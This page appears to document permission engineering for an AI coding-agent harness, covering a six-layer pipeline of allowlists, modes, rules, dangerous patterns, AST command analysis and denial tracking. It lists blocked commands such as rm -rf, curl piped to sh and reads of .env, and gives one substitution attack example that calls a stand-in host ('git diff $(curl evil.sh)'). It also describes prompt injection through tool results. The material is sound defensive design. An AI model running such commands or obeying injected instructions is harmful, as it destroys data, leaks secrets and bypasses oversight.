Permissions

9 min read 1713 words

Table of Contents

Permissions

Permissions

Permissions are the safety layer that decides which actions are allowed, asked, or denied. Permission engineering is harness engineering’s defense system.

The naive approach is binary allow/deny. The actual problem is much harder: balance safety against permission fatigue, prevent rubber-stamping, defend against prompt injection, and stay performant for trivial actions.

The core problem

Unrestricted shell access is dangerous: an agent can rm -rf /, drop tables, leak secrets, force-push to main. Universal approval requirement is also dangerous, but in a different way: users develop permission fatigue and start clicking “approve” without reading. The classifier becomes a placebo.

The real design problem: make safe actions invisible and dangerous actions visible. Trivial reads should never bother the user. Destructive operations should always interrupt them.

The 6-layer permission classification pipeline

Claude Code’s permission system runs every action through 6 layers, cheapest first:

#	Layer	Purpose	Fast path
1	Safe tool allowlist	`FileRead`, `Grep`, `Glob` → skip pipeline	99% of requests fast-pathed
2	Permission modes	7 modes from default → plan → auto → bypass	Mode determines default behavior
3	Rule matching	Exact match, prefix patterns (`:*`), wildcards	allow / deny / ask
4	Dangerous patterns	Block interpreters (`python`, `node`, `eval`, `sudo`) even if a rule allows them	Safety net
5	Command security	Bash AST analysis: substitution, Zsh exploits, heredoc injection	Block / sanitize
6	Denial tracking	3 consecutive or 20 total denials → fall back to human	Anti-fatigue

Why this order:

Cheapest layer first (allowlist is a hash lookup)
Most expensive layer last (AST parsing is slow)
Denial tracking is at the end because it observes the outcome of the previous layers

Key principle: layer ordering is a performance lever AND a safety lever. The fast path runs in microseconds; the slow path catches the dangerous edge cases.

Layer 1: Safe tool allowlist

Reads, greps, globs — operations that cannot mutate state — are unconditionally allowed. They never go through the rest of the pipeline.

Why it matters: 99% of agent actions are reads. Routing them through 6 layers wastes CPU. The allowlist is a fast path that keeps the agent feeling responsive.

Trade-off: “safe” tools can still leak data. Read .env is technically a read, but it should not be on the allowlist. This repo uses privacy-block.cjs to add a privacy layer on top of the safe-tool fast path (see “What this repo does” below).

Layer 2: Permission modes

Seven modes, each with different default behavior:

Mode	Default	Use case
default	Approve risky actions	Normal operation
plan	Read-only, no writes	Explore and plan phase
auto	Low-risk auto-approved, high-risk gated	Productive work with safety net
bypass	Skip approval for approved tools (not dangerous patterns)	Trusted automation
yolo	Full autonomy	Dangerous, demos only
readonly	Strict read-only	Audit / inspection sessions
workspace-write	Write only inside workspace	Project-scoped editing

The mode is the user’s high-level safety choice. Inside the chosen mode, the rest of the pipeline still runs.

Insight: the mode is a category of behavior, not a specific permission. Layers 3–6 still apply within the chosen mode.

Layer 3: Rule matching

User-defined permission rules:

{
  "allow": [
    "Read(/private/data/**)",
    "Bash(npm test*)",
    "Bash(git diff*)"
  ],
  "deny": [
    "Bash(rm -rf*)",
    "Read(.env)"
  ]
}

Three pattern types:

Exact match — Bash(git status)
Prefix match — Bash(git diff*) → matches git diff, git diff HEAD, git diff --stat
Wildcard — Read(/private/data/**) → recursive directory match

Each rule produces one of: allow, deny, ask. First match wins.

Trade-off: users add overly broad rules (“Bash(git*)”) that allow dangerous actions (“git push –force”). Layer 4 catches this.

Layer 4: Dangerous patterns

A safety net for over-broad user rules. Even if the user allows Bash(*), this layer blocks:

python, node, eval — interpreter escape
sudo — privilege escalation
curl ... | sh — pipe-to-shell
> /etc/... — system file overwrite

Why it matters: users will always grant rules that are too broad. This layer is the “you can’t allow this even if you wanted to” backstop. Defense-in-depth: rule matching is the first line; dangerous patterns is the second.

Trade-off: the dangerous-pattern list needs ongoing tuning. New attack surfaces appear (bunx, pnpx, npx ...). Static lists drift.

Layer 5: Command security (AST analysis)

Bash commands get parsed into an AST and analyzed for:

Command substitution — $(...), `...` (allows code execution outside the visible command)
Zsh exploits — =, =( ) glob expansion gotchas
Heredoc injection — <<EOF content can hide commands
Variable expansion attacks — $VAR where VAR is attacker-controlled

The AST layer catches what the regex layer cannot. git diff $MALICIOUS_VAR looks safe to a regex; the AST sees the unbounded substitution and flags it.

Cost: AST parsing is the most expensive layer. That’s why it’s last — only commands that survived the previous layers get parsed.

Layer 6: Denial tracking (anti-fatigue)

The system counts denials. Two thresholds:

3 consecutive denials → escalate to human (stop asking, get explicit override)
20 total denials in a session → escalate to human

Why: if the agent is being denied repeatedly, the rules are wrong or the agent is doing something genuinely off-path. Either way, the human needs to intervene.

The escalation path is: stop the auto-classifier, surface the situation as a structured prompt, let the human decide whether to broaden the rules, abort the task, or adjust the agent’s approach.

Insight: denial tracking turns the permission system into a feedback loop. Repeated denials are a signal that the rules need tuning, not just an annoyance.

Speculative classifier

BashTool starts the permission check in parallel with input parsing. By the time canUseTool() is called, the classification result may already be ready. Reduces perceived latency for the user.

Lesson: if you have a slow check that’s deterministic given the input, start it as soon as the input is available. Don’t wait for the consumer to ask.

Defense in depth

Permissions are enforced at multiple levels simultaneously:

Tool list — agent doesn’t have the tool at all (e.g., coordinator without Edit)
Permission rules — tool exists but its use is gated
Dangerous patterns — even allowed tools have hard blocks on certain inputs
AST analysis — even safe-looking inputs get parsed for hidden risk
Denial tracking — even with all of the above, repeated denials escalate

Any single layer can fail; the rest catch it. This is the “Swiss cheese” model of safety: holes in one slice are blocked by the next.

Anti-patterns

Binary allow/deny. No “ask” middle ground. Users get fatigued or get burned.
Single-layer enforcement. “We have permission rules” — and nothing else. One bad rule = compromise.
No allowlist fast path. Every read goes through 6 layers. Slow and battery-killing.
No dangerous-pattern net. User grants Bash(*) and gets rm -rf for free.
Regex-only command parsing. Misses substitution, heredocs, variable injection. Use an AST.
No denial tracking. Permission fatigue is invisible. Users start rubber-stamping; agents get away with more.
Permission by prompt. “The agent is told not to do dangerous things.” Prompts fail under context pressure. Enforce by capability.
No mode separation. One permission state for all sessions. Plan-mode and yolo-mode are the same agent.
Synchronous deep checks on the fast path. AST-parsing every Read. Kills latency.
Permission rules without versioning. Users edit them, things break, no history.

Takeaways for harness engineering

Layer the pipeline. Cheap → expensive. Allowlist → modes → rules → dangerous patterns → AST → denial tracking. Each layer has a different job.
Default to deny. New tools are denied until explicitly allowed.
Defense in depth. Multiple layers must independently catch the same threat.
Track denials. Repeated denials = wrong rules OR off-path agent. Surface it.
Speculative classification. Start the check before the consumer asks. Hide latency.
Permission rules are versioned config. Diff them, review them, alert on changes.
Capability removal beats prompt restriction. If the agent shouldn’t do X, remove the tool, don’t ask nicely.
Mode is a UX shortcut. Modes encode common configurations. Behind the mode, the layers still apply.
AST > regex for command analysis. Always.
Privacy is orthogonal to permission. A Read action can be permitted but privacy-blocked. Use a separate layer for sensitive content.

What this repo does

hooks/scout-block.cjs — implements a scout-style allowlist + denylist on top of all file/bash operations. Reads .ckignore (gitignore syntax). Blocks reads from node_modules/, dist/, .venv/, etc. but allows build commands (npm build, cargo build, terraform, kubectl). Layer 1 + Layer 4 combined.
hooks/privacy-block.cjs — privacy-based blocking, separate from size-based scout-block. Blocks Read .env, credentials.json, etc. unless the LLM uses an APPROVED: prefix that requires user approval first. Layer 4 with a UX twist: the agent must explicitly request override, can’t sneak past.
skills/careful/ — destructive command guardrail. Registers a PreToolUse(Bash) hook that intercepts rm -rf, DROP TABLE, force-push, git reset --hard, kubectl delete. Each warning is overridable. Layer 4 as a user-invocable mode.
skills/freeze/ — edit-scope guardrail. Registers a PreToolUse(Edit) hook that restricts writes to one directory per session. Layer 3-equivalent for writes, scoped to the session.
hooks/guard-task.cjs — forces user approval before subagent spawning. Permission gate on a tool that’s expensive rather than dangerous.
settings.json permissions block — Layer 3 rule matching, project-wide.
settings.local.json permissions block — same, machine-specific overrides (additive).

Gaps in this repo

No AST-level command analysis. Bash commands are checked by regex/string matching only. A git diff $(curl evil.sh) substitution attack would slip past.
No denial tracking. The harness doesn’t count denials or escalate after repeated friction. Fatigue is invisible.
No speculative classifier. Permission checks are synchronous on the critical path.
No formal mode system. Plan / act / yolo modes are not first-class — they’re emergent from skill invocations.
Dangerous-pattern list is small. careful skill has the most coverage; the global hook layer doesn’t have a baseline dangerous-pattern check.

Open problems

Auto-mode classifier. Claude Code’s “auto-mode” uses an LLM classifier to auto-approve low-risk actions. The prompt is unknown; the accuracy is unknown; the failure modes are unknown. Open research.
Permission rule audit. Users add allow rules that are too broad over time. No periodic audit mechanism. How do you detect that the security posture has degraded?
Multi-tenant isolation. Permission rules are per-project. In a multi-user platform, who decides which rules are enforced? Open problem.
Prompt injection defense. Tool results contain external data (file contents, web pages). Attacker embeds instructions. Claude Code relies on model judgment (“flag suspected prompt injection before continuing”). No structural defense — known gap.

Permissions#

The core problem#

The 6-layer permission classification pipeline#

Layer 1: Safe tool allowlist#

Layer 2: Permission modes#

Layer 3: Rule matching#

Layer 4: Dangerous patterns#

Layer 5: Command security (AST analysis)#

Layer 6: Denial tracking (anti-fatigue)#

Speculative classifier#

Defense in depth#

Anti-patterns#

Takeaways for harness engineering#

What this repo does#

Gaps in this repo#

Open problems#

Permissions

The core problem

The 6-layer permission classification pipeline

Layer 1: Safe tool allowlist

Layer 2: Permission modes

Layer 3: Rule matching

Layer 4: Dangerous patterns

Layer 5: Command security (AST analysis)

Layer 6: Denial tracking (anti-fatigue)

Speculative classifier

Defense in depth

Anti-patterns

Takeaways for harness engineering

What this repo does

Gaps in this repo

Open problems